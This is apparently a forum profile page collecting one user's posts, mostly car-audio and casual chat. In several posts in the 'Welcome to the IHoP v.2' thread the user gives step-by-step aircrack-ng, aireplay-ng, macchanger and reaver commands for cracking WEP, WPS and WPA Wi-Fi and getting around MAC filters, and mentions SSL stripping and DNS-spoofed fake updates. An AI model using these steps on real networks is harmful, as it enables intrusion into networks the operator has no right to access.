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Everything posted by ssh

  1. ssh

    Welcome to the IHoP v.2

    If their using WPA, Use same steps as WEP to find bssid of AP, channel, clients connecting, and spoof mac address if needed, then: airodump-ng mon0 -c channel -t wpa -d bssid -w log crtl+shift+t aireplay-ng -0 50 -a bssid -c clientmac mon //this one may have to be ran several times, and number 50 adjusted along the way since it's deauthing connected devices, and airodump is attempting to record the handshake. If you continually deauth them then they can't connect, but sending a few deauths may not be seen. watch first terminal until airodump shows a wpa handshake captured, then kill both processes. aircrack-ng log-01.cap -J crackme If your computer sucks you can use aircrack with some wordlists against log-01.cap, or throw the crackme file against oclhashcat-plus (GPU based). Two AMD HD 6990 results in 350,000 keys tested per second. Brute forcing the min 8 characters doesn't very long. Then throw in wordlists and rules, and the only thing between them and the router is a strong password.
  2. ssh

    Welcome to the IHoP v.2

    If router is using WPS then you can do the above to grab the bssid "mac address" of the router, then simply run reaver: reaver -i mon0 -v -A -c 1 -b 00:11:22:33:44:55 This may take over a day or so, but it will work, only takes around 11k guesses until it finds the pin.
  3. ssh

    Welcome to the IHoP v.2

    While it's possible to crack all of these types of encryption, using a mac filter will take care of any of this for the most part. It's pretty difficult to realistically crack a wireless network unless you really know what you are doing. If you have MAC filter in place on your router though, it's WAY harder to get connected. The router will simply block a computer based on it's hardware id, so unless someone physically breaks in and finds out what your hardware ids are, they aren't getting connected. If someone were willing to do that you must have some important shit on lock haha. There are ways to get in obviously or these multibillion dollar corporations wouldn't get hacked, but that is a lot of effort just to access someone's personal accounts. That actually isn't very helpful. Run airodump-ng in monitor mode for five minutes on the access point, and see which clients are connecting (check their MAC address). Then change your mac address with macchanger (unix), or under network device settings in windows to reflect one of the client's mac address, and now the router will accept your connection. And realistically no it's not difficult to crack a wireless network. WEP ------ airmon-ng check kill //kill any proccesses using wireless cards airmon-ng //lists wireless cards / devices airmon-ng start wlan0 //start wlan0 interface, and create monitor mode on mon0 airodump-ng mon0 //or use kismet, select access point and clients. note mac address for one of the clients. crtl-c //kill airodump-ng process ifconfig mon0 down macchanger -m 00:11:22:33:44:55 mon0 //set to client mac address ifconfig mon0 up airodump-ng -c 2 -w logfile --bssid bssidofap mon //start capturing packets on access point "bssidofap" on channel 2, and record to logfile crtl+shift+t //new terminal aireplay-ng -1 0 -a bssid mon0 //fake authent with ap crtl+shift+t aireplay-ng -3 -b bssid mon0 //create arp packets, creates traffic wait until 10-50k packets, then kill aireplay and airodump. aircrack-ng logfile-01.cap five minutes later WEP key is known.
  4. ssh

    Welcome to the IHoP v.2

    I'm actually working on a summer project using a camera and yagi antenna near our shooting targets to relay the video back to a laptop for spotting.
  5. ssh

    Welcome to the IHoP v.2

    That's much more reasonable than adding a few extra characters to a passphrase. I know you have lots of land, but it's not that difficult to pick up signals from over 1km away at times.
  6. ssh

    Welcome to the IHoP v.2

    Breaking wep takes under 10min. If router uses wps, 24 hours max. If using wpa, deauth clients, and record handshake upon reconnection. Might take 5 minutes, might take a few days until a wireless device is used. Either way they get the hash. Only safe guard is a strong password. Ub3R+c0d31 is not strong. Once they're on the network they can grab just about every login. Hit up the bank site, and the connection is no longer ssl https because its been stripped down to a standard http connection. OS patched up to date, no vulnerabilities, safe right? When iTunes, windows mail, filezilla, Microsoft update, etc all start up they connect to a server to check for updates, and the dns request can be spoofed so they connect to the wrong server, and download a fake update. That's definitely a lot of work to single someone random out for all that, and I doubt it'll happen, but its possible, and as Matt said, not very difficult.
  7. ssh

    Circle cutting tool for Router

    Jasper circle jig is the one I've used, and it worked well.
  8. ssh

    Happy Birthday Alton!

    Happy Birthday!
  9. ssh

    Welcome to the IHoP v.2

    That's good. WPA requires at least 8 characters, so of course most people use 8.
  10. ssh

    Welcome to the IHoP v.2

    If you don't want people using your internet, disable WPS, use WPA, and use a long password with lowercase,uppercase,numbers, perhaps symbols--otherwise it's up for grabs.
  11. ssh

    Welcome to the IHoP v.2

    I have 5.5lbs of "whey protein concentrate - high grade" from True Nutrition unopened if you or anyone else wants it--just pay shipping. I'll take it PM'd.
  12. ssh

    4 BL port length

    It's the formula for vent mach from the loudspeaker cookbook. Pretty close if not the same as WinISD iirc.
  13. ssh

    Welcome to the IHoP v.2

    I'm gonna start bugging you about the ins and outs to everything in a year or so. I'm looking at a BS in biochem and BS in MCB then decide if I want to continue on. In my chem class this girl is double majoring in the same fields as me, so I told her I'm going to sign up for every single one of her classes for the next four years, ROFL. LMAO, I sort of did that with a buddy i graduated high school with. We both went into biochem and he always figured out his schedule before me so i just copied it haha. But if you want some info on a BS in Biochem ill be glad to help, plus i should have a fresh perspective compared to some since i just got my degree this month lol. Sweet. Probably be a while until I'm actually "in the shit."
  14. ssh

    Welcome to the IHoP v.2

    I have 5.5lbs of "whey protein concentrate - high grade" from True Nutrition unopened if you or anyone else wants it--just pay shipping.
  15. ssh

    4 BL port length

    Vd, Tuning, and Power. *The lower the tuning, more port area is needed. Power can be completely removed (its literally not in the equation). If you do then you might as well include box volume which affects Q and affects power needed to accelerate the piston to xmax. I should have said vas instead of vd. I've been using this: http://s0.wp.com/latex.php?latex=\frac{13.7\sqrt{\frac{9.64+\times+10^{-10}+*+fs^3+*+vas+*+power}{qes}}}{Fb+*+R^2}&bg=ffffff&fg=000&s=3 from the loudspeaker book. Is there another equation that implies the driver reaches full excursion, so it doesn't require power?
  16. ssh

    4 BL port length

    I wouldn't sweat it.
  17. ssh

    4 BL port length

    Vas, Tuning, and Power. *The lower the tuning, more port area is needed.
  18. ssh

    Team IAK IronMan Explorer

    why is gain all the way to six volts?A better question is: how do you know it's set to 6v?Looks like it from this angle. My deepest apologiesConsidering the gain adjustment likely exceeds 360 degrees it's hard to know. Oh and no need for apology, I'm just being a smart ass.
  19. ssh

    Welcome to the IHoP v.2

    I'm gonna start bugging you about the ins and outs to everything in a year or so. I'm looking at a BS in biochem and BS in MCB then decide if I want to continue on. In my chem class this girl is double majoring in the same fields as me, so I told her I'm going to sign up for every single one of her classes for the next four years, ROFL.
  20. ssh

    Welcome to the IHoP v.2

    Lulz. On a side note you should get some board space there and pimp out the new drivers when they're out.
  21. ssh

    fusion 10" bass tube

    I haven't looked at that part of it.but he said it is wired to the battery.You're going to have to check everything--don't take his word for it. lol I'll take his word for it.he's an IBEW workerSorta flawed statement considering he's needing your assistance, don't you think? I was really meaning to just recheck everything so you know the issue isn't in something you've crossed off the list but haven't checked, nothing personal about his abilities or trust.
  22. Closed cell foam. http://www.sounddeadenershowdown.com/ Scroll down to view ccf.
  23. ssh

    Team IAK IronMan Explorer

    why is gain all the way to six volts?A better question is: how do you know it's set to 6v?
  24. ssh

    Welcome to the IHoP v.2

    Third time is a charm, this is the fucking hop, there's your definition!
  25. ssh

    Welcome to the IHoP v.2

    I'll give you some advice trod: It's not about what you know, but who you know. Sorry I had to. :rofl: